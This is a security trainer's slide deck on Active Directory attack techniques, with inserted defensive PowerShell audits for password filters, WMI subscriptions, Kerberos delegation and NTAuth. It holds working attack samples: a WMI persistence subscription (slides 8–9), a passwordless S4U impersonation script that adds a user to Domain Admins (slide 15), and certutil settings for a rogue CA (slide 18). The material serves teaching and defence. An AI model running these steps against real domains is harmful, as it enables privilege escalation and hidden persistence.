Page 1

What would a real hacker do to your AD

GOPAS: info@gopas,cz | www.gopas.cz | www.facebook.com/P.S.GOPAS

Ing. Ondřej Ševeček | GOPAS a.s. |

MCM: Directory Services | MVP: Enterprise Security | Certified Ethical Hacker |

[email protected] | www.sevecek.com |

Page 2

Intro

What happens when they take one of your DCs? You are doomed
• must reinstall the whole forest from scratch
• may be able to restore the whole forest from the last clean backup, provided you are sure the intrusion will not happen again

Page 3

Why do I show these things

Secure machines physically
Do not use domain admin credentials on insecure machines
Separate administrative accounts
Never use admin accounts to access services
Stress on strong passwords, or rather use smart cards

Page 4

Agenda

Physical DC security
Password filters
Hidden accounts
Hidden scheduled tasks
Forest is a security boundary
Exploiting Kerberos delegation
Logon without passwords

Page 5

Physical DC security

Having physical access means you have full power over data, settings and binaries
• partially substitute physical security with BitLocker and TPM
• use RODCs at insecure locations

Hardware keyloggers
Reboot and offline modifications

Page 6

Password filters

Password change/reset after an attack means nothing

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Notification Packages = MULTI_SZ
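A check for this registry value, added here and not part of the presentation: it lists the registered notification packages on the local machine and flags any that are not the assumed Windows defaults (rassfm and scecli on a domain controller, scecli alone on other machines).

```powershell
# Added example, not from the presentation: audit the LSA notification
# packages (password filters) on this machine. LSA hands every new cleartext
# password to each DLL named here, so an unknown entry means that resetting
# passwords after an incident changes nothing.
# Assumed defaults: a domain controller ships with 'rassfm' and 'scecli';
# member servers and workstations normally have only 'scecli'.
$key      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$expected = @('rassfm', 'scecli')

function Get-PasswordFilterAudit {
    $packages = (Get-ItemProperty -Path $key -Name 'Notification Packages').'Notification Packages'
    foreach ($pkg in $packages) {
        if ([string]::IsNullOrWhiteSpace($pkg)) { continue }   # MULTI_SZ may carry empty strings

        # LSA loads the package by bare name from System32, so that is where to look
        $dll    = Join-Path $env:SystemRoot "System32\$pkg.dll"
        $status = if ($expected -contains $pkg) { 'expected' } else { 'REVIEW' }

        # An unsigned or missing binary behind a filter name is worth a closer look
        if (Test-Path $dll) {
            $signature = (Get-AuthenticodeSignature -FilePath $dll).Status
        } else {
            $signature = 'file not found'
        }

        [pscustomobject]@{
            Package   = $pkg
            Status    = $status
            Path      = $dll
            Signature = $signature
        }
    }
}

Get-PasswordFilterAudit | Format-Table -AutoSize
```

The value is per machine, so run it on every domain controller: a single DC with an extra entry is enough for the filter to see password changes handled by that DC.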

Page 7

Hidden accounts

You are never able to do a 100% security audit after an attack

Not even Domain Admins can see everything

Page 8

Hidden scheduled tasks

You are never able to do a 100% security audit after an attack

Not even the prominent audit tools know everything
• root\subscription
• ActiveScriptEventConsumer
  Name =
  ScriptingEngine = VBScript
  ScriptText =
  set fso = CreateObject("Scripting.FileSystemObject") : fileName = "c:\showit" & "-" & Year(Now) & "-" & Month(Now) & "-" & Day(Now) & "-" & Hour(Now) & "-" & Minute(Now) & "-" & Second(Now) & ".txt" : set newFile = fso.CreateTextFile(fileName) : newFile.WriteLine("I will be here for ever!") : newFile.Close()

Page 9

Hidden scheduled tasks

You are never able to do a 100% security audit after an attack

… continuing …
• __EventFilter
  Name =
  QueryLanguage = WQL
  EventNamespace = root\cimv2
  Query =
  SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA "Win32_LocalTime" AND TargetInstance.Second = 9

Win32_LocalTime properties usable in the filter: Second, Minute, Hour, DayOfWeek, Month, Quarter, Year, WeekInMonth
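A way to see such subscriptions, added here and not part of the presentation: the consumer and filter above are inert until a __FilterToConsumerBinding links them, so the script walks the bindings in root\subscription and shows what each one fires on and what it runs. It uses only the CIM cmdlets and needs administrative rights on the machine being checked.

```powershell
# Added example, not from the presentation: list every permanent WMI event
# subscription on this machine. Filter + consumer + binding survive reboots,
# need no service and no scheduled task, and Task Scheduler never shows them.
$ns = 'root\subscription'

function Get-WmiPersistence {
    $filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
    $consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer   # base class: all consumer types
    $bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding

    foreach ($b in $bindings) {
        # Filter and Consumer are object references; their key property Name identifies each half
        $f = $filters   | Where-Object Name -eq $b.Filter.Name
        $c = $consumers | Where-Object Name -eq $b.Consumer.Name
        $consumerClass = $c.CimSystemProperties.ClassName

        # What the consumer executes depends on its class
        $payload = switch ($consumerClass) {
            'ActiveScriptEventConsumer' { "$($c.ScriptingEngine): $($c.ScriptText)$($c.ScriptFileName)" }
            'CommandLineEventConsumer'  { "$($c.ExecutablePath) $($c.CommandLineTemplate)" }
            default                     { ($c | Format-List * | Out-String).Trim() }
        }

        [pscustomobject]@{
            Filter        = $f.Name
            Namespace     = $f.EventNamespace
            Query         = $f.Query
            ConsumerClass = $consumerClass
            Consumer      = $c.Name
            Payload       = $payload
        }
    }
}

Get-WmiPersistence | Format-List
```

A Win32_LocalTime filter like the one on the slide shows up with a Query that polls __InstanceModificationEvent every second, which is the shape to look for; legitimate software rarely registers one.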

Page 10

Forest is a security boundary

Domain Admins from any domain of a forest are also Domain Admins in any other domain as well
• Site level GPOs
• No SID filtering inside forest
• NTAuth CAs
• Stealing KDC passwords (krbtgt account)
• …

Page 11

Subdomain scenario

Forest diagram:
  gopas.virtual (forest root)
    CZ.gopas.virtual
    DE.gopas.virtual

Page 12

Kerberos delegation with protocol transition

Password is not the only means of logging on to network services
• no credentials necessary at all

Trust this computer to specified services only
• Any authentication protocol

Page 13

Kerberos delegation

Diagram: Client (Kamil) -> App Server -> DB, LDAP, FS
Kamil appears twice: he authenticates to the App Server, and the App Server then reaches the back-end services (DB, LDAP, FS) under Kamil's identity.

Page 14

Kerberos delegation with protocol transition

Diagram: App Server -> DB, LDAP, FS, as Kamil
No client in the picture: the App Server obtains Kamil's service tickets itself, without Kamil ever authenticating to it.

Page 15

Delegation with PowerShell

# Enable SeTcbPrivilege (privilege LUID 7). Adjust-Privilege is not a
# built-in cmdlet; it is a helper defined elsewhere by the presenter.
Adjust-Privilege 7 $true

# S4U logon: build a token for the user from the UPN alone, no password
# (the UPN is elided in the source)
$winId = New-Object System.Security.Principal.WindowsIdentity '[email protected]'

# Identity before impersonation
[Security.Principal.WindowsIdentity]::GetCurrent()

$winId.Impersonate()

# Identity after impersonation: the thread now runs as the impersonated user
[Security.Principal.WindowsIdentity]::GetCurrent()

# Use the impersonated identity against LDAP: add Leos to Domain Admins
$domainAdmins = [ADSI] 'LDAP://CN=Domain Admins,CN=Users,DC=gopas,DC=virtual'
$domainAdmins.Add('LDAP://CN=Leos,OU=People,OU=Company,DC=gopas,DC=virtual')
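The audit that goes with slides 12 to 15, added here and not part of the presentation: it lists every account the domain trusts for constrained delegation, marks those with protocol transition ("Any authentication protocol", the setting the demo above relies on), and checks whether Domain Admins carry the "Account is sensitive and cannot be delegated" flag that keeps any service from obtaining tickets in their name. It assumes the RSAT ActiveDirectory module and read access to the domain.

```powershell
# Added example, not from the presentation: who is trusted for delegation,
# and which privileged users can still be delegated.
Import-Module ActiveDirectory

$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # userAccountControl: "Use any authentication protocol"
$TRUSTED_FOR_DELEGATION         = 0x80000     # userAccountControl: unconstrained delegation
$NOT_DELEGATED                  = 0x100000    # userAccountControl: "Account is sensitive and cannot be delegated"
$bitAnd = '1.2.840.113556.1.4.803'            # LDAP_MATCHING_RULE_BIT_AND

function Get-DelegationTrustedAccounts {
    $filter = "(|(userAccountControl:$bitAnd:=$TRUSTED_TO_AUTH_FOR_DELEGATION)" +
              "(userAccountControl:$bitAnd:=$TRUSTED_FOR_DELEGATION))"
    Get-ADObject -LDAPFilter $filter -Properties sAMAccountName, userAccountControl, msDS-AllowedToDelegateTo |
        ForEach-Object {
            $uac = [int]$_.userAccountControl
            [pscustomobject]@{
                Account             = $_.sAMAccountName
                Class               = $_.ObjectClass
                ProtocolTransition  = [bool]($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
                Unconstrained       = [bool]($uac -band $TRUSTED_FOR_DELEGATION)
                # SPNs this account may obtain tickets for on behalf of other users
                AllowedToDelegateTo = ($_.'msDS-AllowedToDelegateTo' -join '; ')
            }
        }
}

# Mitigation check: members of Domain Admins without NOT_DELEGATED can be
# impersonated by any service trusted for delegation, as in the demo above.
function Get-DelegatableDomainAdmins {
    Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
        Where-Object objectClass -eq 'user' |
        Get-ADUser -Properties userAccountControl |
        Where-Object { -not ($_.userAccountControl -band $NOT_DELEGATED) } |
        Select-Object SamAccountName, DistinguishedName
}

Get-DelegationTrustedAccounts  | Format-Table -AutoSize
Get-DelegatableDomainAdmins    | Format-Table -AutoSize
```

Every account in the first list with ProtocolTransition set can do what the demo does for any user in the second list, so both lists should be short and known.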

Page 16

Smart card logon

Password is not the only means of logging on to computers

NTAuth CA
• forest wide trust
• do not need to consult AD or touch LDAP at all

Notes
• ldap:///CN=GOPAS%20Root%20Online%20CA,CN=DC1,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=gopas,DC=virtual?certificateRevocationList?base?objectClass=cRLDistributionPoint

Page 17

Fake Microsoft CA

Something must always be trusted

Root CA
• CN=Microsoft Root Authority,OU=Microsoft Corporation,OU=Copyright (c) 1997 Microsoft Corp.

Code signing cert
• CN=Microsoft Corporation,OU=MOPR,O=Microsoft Corporation,L=Redmond,S=Washington,C=US

Page 18

Fake Microsoft CA

Longer validity for issued certificates
• CERTUTIL -setreg CA\ValidityPeriodUnits 5

No certificate template name extension
• CERTUTIL -setreg policy\DisableExtensionList +1.3.6.1.4.1.311.21.7

No CRL paths into issued certificates
• certutil -setreg DBFlags +DBFLAGS_ENABLEVOLATILEREQUESTS
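A review of what the forest trusts for certificate logon (slides 16 to 18), added here and not part of the presentation: it reads the NTAuth store from the configuration partition over plain ADSI, so it runs from any domain-joined machine, and flags entries with Microsoft-looking names, since NTAuth should contain only your own enterprise CAs. $knownGood is a placeholder for the thumbprints of those CAs.

```powershell
# Added example, not from the presentation: dump the forest-wide NTAuth store
# and flag entries that deserve a second look.
$rootDse  = [ADSI] 'LDAP://RootDSE'
$configNC = $rootDse.configurationNamingContext.Value
$ntAuth   = [ADSI] "LDAP://CN=NTAuthCertificates,CN=Public%20Key%20Services,CN=Services,$configNC".Replace('%20', ' ')

# Placeholder: thumbprints of the enterprise CAs you know you operate
$knownGood = @()

function Get-NTAuthAudit {
    foreach ($raw in $ntAuth.Properties['cACertificate']) {
        $cert  = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList (,[byte[]]$raw)
        $flags = @()

        # Microsoft's own roots never belong in an enterprise NTAuth store; a
        # Microsoft-looking subject here is a mistake or a look-alike CA
        if ($cert.Subject -match 'Microsoft') { $flags += 'Microsoft-like subject' }
        if ($knownGood.Count -gt 0 -and $knownGood -notcontains $cert.Thumbprint) { $flags += 'not in known-good list' }
        if ($cert.NotAfter -lt (Get-Date)) { $flags += 'expired' }

        [pscustomobject]@{
            Subject    = $cert.Subject
            Issuer     = $cert.Issuer
            Thumbprint = $cert.Thumbprint
            NotAfter   = $cert.NotAfter
            Flags      = ($flags -join ', ')
        }
    }
}

Get-NTAuthAudit | Format-List
```

On a CA you suspect was reconfigured as on the last slide, certutil -getreg CA\ValidityPeriodUnits, certutil -getreg policy\DisableExtensionList and certutil -getreg DBFlags show the current values.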

Page 19

GOODBYE

GOPAS: info@gopas,cz | www.gopas.cz | www.facebook.com/P.S.GOPAS

See you at courses in the GOPAS, a.s. computer school

GOC171 - Active Directory Troubleshooting

GOC172 - Kerberos Troubleshooting

GOC173 - Enterprise PKI Deployment

GOC175 - Administering Security